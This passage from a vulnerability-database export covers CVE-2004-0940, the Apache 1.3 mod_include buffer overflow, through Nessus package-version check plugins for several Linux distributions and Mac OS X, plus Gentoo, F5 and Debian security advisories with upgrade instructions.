the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-1.3.32-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 1.3.32-r1\"), vulnerable:make_list(\"lt 1.3.32-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 1.3\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:16", "description": "New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user. The mod_ssl\npackage has also been upgraded to version 2.8.22_1.3.33.", "edition": 24, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : apache+mod_ssl (SSA:2004-305-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0940"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:apache", "p-cpe:/a:slackware:slackware_linux:mod_ssl"], "id": "SLACKWARE_SSA_2004-305-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18788", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-305-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18788);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0940\");\n script_xref(name:\"SSA\", value:\"2004-305-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : apache+mod_ssl (SSA:2004-305-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user. The mod_ssl\npackage has also been upgraded to version 2.8.22_1.3.33.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bbba9317\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"8.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"9.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"9.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"10.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apache\", pkgver:\"1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mod_ssl\", pkgver:\"2.8.22_1.3.33\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:21", "description": "Updated apache and mod_ssl packages that fix various minor security\nissues and bugs in the Apache Web server are now available for Red Hat\nEnterprise Linux 2.1.\n\nThe Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer\n(SSL) and Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side\ninclude (SSI) files to gain the privileges of a httpd child (user\n'apache'). The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious\nuser who is able to sniff network traffic to conduct a replay attack\nagainst a website using Digest protection. Note that mod_digest\nimplements an older version of the MD5 Digest Authentication\nspecification, which is known not to work with modern browsers. This\nissue does not affect mod_auth_digest. (CVE-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in a directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client is able to access that\nlocation using any cipher suite allowed by the virtual host\nconfiguration. (CVE-2004-0885).\n\nSeveral bugs in mod_ssl were also discovered, including :\n\n - memory leaks in SSL variable handling\n\n - possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should\nupgrade to these erratum packages, which contains Apache version\n1.3.27 with backported patches correcting these issues.", "edition": 28, "published": "2004-12-14T00:00:00", "title": "RHEL 2.1 : apache, mod_ssl (RHSA-2004:600)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0987", "CVE-2004-0885", "CVE-2004-0940"], "modified": "2004-12-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:apache", "p-cpe:/a:redhat:enterprise_linux:apache-manual", "p-cpe:/a:redhat:enterprise_linux:apache-devel"], "id": "REDHAT-RHSA-2004-600.NASL", "href": "https://www.tenable.com/plugins/nessus/15960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:600. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15960);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0987\", \"CVE-2004-0885\", \"CVE-2004-0940\");\n script_xref(name:\"RHSA\", value:\"2004:600\");\n\n script_name(english:\"RHEL 2.1 : apache, mod_ssl (RHSA-2004:600)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache and mod_ssl packages that fix various minor security\nissues and bugs in the Apache Web server are now available for Red Hat\nEnterprise Linux 2.1.\n\nThe Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer\n(SSL) and Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side\ninclude (SSI) files to gain the privileges of a httpd child (user\n'apache'). The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious\nuser who is able to sniff network traffic to conduct a replay attack\nagainst a website using Digest protection. Note that mod_digest\nimplements an older version of the MD5 Digest Authentication\nspecification, which is known not to work with modern browsers. This\nissue does not affect mod_auth_digest. (CVE-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to\nuse the 'SSLCipherSuite' directive in a directory or location context.\nIf a particular location context has been configured to require a\nspecific set of cipher suites, then a client is able to access that\nlocation using any cipher suite allowed by the virtual host\nconfiguration. (CVE-2004-0885).\n\nSeveral bugs in mod_ssl were also discovered, including :\n\n - memory leaks in SSL variable handling\n\n - possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should\nupgrade to these erratum packages, which contains Apache version\n1.3.27 with backported patches correcting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:600\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/12/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:600\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-devel-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-manual-1.3.27-9.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"mod_ssl-2.8.12-7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-devel / apache-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:25:05", "description": "The remote host is missing Security Update 2004-12-02. This security\nupdate contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a\nremote attacker to execute arbitrary code.", "edition": 23, "published": "2004-12-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1121", "CVE-2004-0644", "CVE-2004-1123", "CVE-2004-0786", "CVE-2004-0747", "CVE-2003-0987", "CVE-2004-0643", "CVE-2004-0885", "CVE-2004-1122", "CVE-2004-0804", "CVE-2004-1086", "CVE-2004-0642", "CVE-2004-0748", "CVE-2004-1088", "CVE-2004-1087", "CVE-2004-0803", "CVE-2004-1084", "CVE-2004-1081", "CVE-2004-0940", "CVE-2004-1082", "CVE-2004-0772", "CVE-2004-0174", "CVE-2004-1089", "CVE-2004-0488", "CVE-2004-1083", "CVE-2004-0492", "CVE-2003-0020", "CVE-2004-1085", "CVE-2004-0886", "CVE-2004-0751"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20041202.NASL", "href": "https://www.tenable.com/plugins/nessus/15898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3004) exit(0); # a large number of xrefs.\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(15898);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2004-1082\", \"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2004-0174\", \"CVE-2004-0488\", \n \"CVE-2004-0492\", \"CVE-2004-0885\", \"CVE-2004-0940\", \"CVE-2004-1083\", \"CVE-2004-1084\", \n \"CVE-2004-0747\", \"CVE-2004-0786\", \"CVE-2004-0751\", \"CVE-2004-0748\", \"CVE-2004-1081\", \n \"CVE-2004-0803\", \"CVE-2004-0804\", \"CVE-2004-0886\", \"CVE-2004-1089\", \"CVE-2004-1085\", \n \"CVE-2004-0642\", \"CVE-2004-0643\", \"CVE-2004-0644\", \"CVE-2004-0772\", \"CVE-2004-1088\", \n \"CVE-2004-1086\", \"CVE-2004-1123\", \"CVE-2004-1121\", \"CVE-2004-1122\", \"CVE-2004-1087\");\n script_bugtraq_id(9921, 9930, 9571, 11471, 11360, 11469, 10508, 11802);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)\");\n script_summary(english:\"Check for Security Update 2004-12-02\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is missing Security Update 2004-12-02. This security\nupdate contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a\nremote attacker to execute arbitrary code.\" );\n # http://web.archive.org/web/20080915104713/http://support.apple.com/kb/HT1646?\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?210abeb5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-12-02.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.2.8, 10.3.6 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.6\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecUpd(Srvr)?2004-12-02\", string:packages) ) security_hole(0);\n\telse non_vuln = 1;\n}\nelse if ( egrep(pattern:\"Darwin.* (6\\.9|[0-9][0-9]\\.|7\\.([7-9]|[0-9][0-9]\\.|[8-9]\\.))\", string:uname) ) non_vuln = 1;\n\nif ( non_vuln )\n{\n set_kb_item(name:\"CVE-2004-1082\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0987\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0488\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0492\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0885\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0940\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1083\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1084\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0747\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0786\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0751\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0748\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1081\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0803\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0804\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0886\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1089\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1085\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0642\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0643\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0644\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0772\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1088\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1086\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1123\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1121\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1122\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1087\", value:TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "edition": 1, "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the internet. mod_include is an Apache module to handle Server Side Includes (SSI). \n\n### Description\n\nA possible buffer overflow exists in the get_tag() function of mod_include.c. \n\n### Impact\n\nIf Server Side Includes (SSI) are enabled, a local attacker may be able to run arbitrary code with the rights of an httpd child process by making use of a specially-crafted document with malformed SSI. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Apache users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-1.3.32-r1\"", "modified": "2007-12-30T00:00:00", "published": "2004-11-02T00:00:00", "id": "GLSA-200411-03", "href": "https://security.gentoo.org/glsa/200411-03", "type": "gentoo", "title": "Apache 1.3: Buffer overflow vulnerability in mod_include", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2020-04-06T22:40:46", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "", "edition": 1, "modified": "2018-07-03T23:32:00", "published": "2007-05-17T04:00:00", "id": "F5:K4207", "href": "https://support.f5.com/csp/article/K4207", "title": "Buffer overflow in mod_include - CAN-2004-0940", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:18:40", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 594-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nNovember 17th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache\nVulnerability : buffer overflows\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2004-0940\n\nTwo vulnerabilities have been identified in the Apache 1.3 webserver:\n\nCAN-2004-0940\n\n &quot;Crazy Einstein&quot; has discovered a vulnerability in the\n &quot;mod_include&quot; module, which can cause a buffer to be overflown and\n could lead to the execution of arbitrary code.\n\nNO VULN ID\n\n Larry Cashdollar has discovered a potential buffer overflow in the\n htpasswd utility, which could be exploited when user-supplied is\n passed to the program via a CGI (or PHP, or ePerl, ...) program.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.3.33-2.\n\nWe recommend that you upgrade your apache packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.dsc\n Size/MD5 checksum: 668 fa649037f25230b2ba98f8efd713ad88\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.diff.gz\n Size/MD5 checksum: 299617 1765e5037ede60c140b9e23b063229ea\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz\n Size/MD5 checksum: 2586182 5cd778bbe6906b5ef39dbb7ef801de61\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody6_all.deb\n Size/MD5 checksum: 1022694 f0446d04bf9c37df0b8a1f9be6f3aad6\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 395536 15fdfaaa7dbbc72258e08796648f4b8e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 926002 ebbf79cf5c21f90b195bbd43948013e4\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 713916 fe8f05f9645bd3e8488390c6fd1b2b51\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_arm.deb\n Size/MD5 checksum: 361166 1c18634efb67b0cbb2de9a109dd02714\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_arm.deb\n Size/MD5 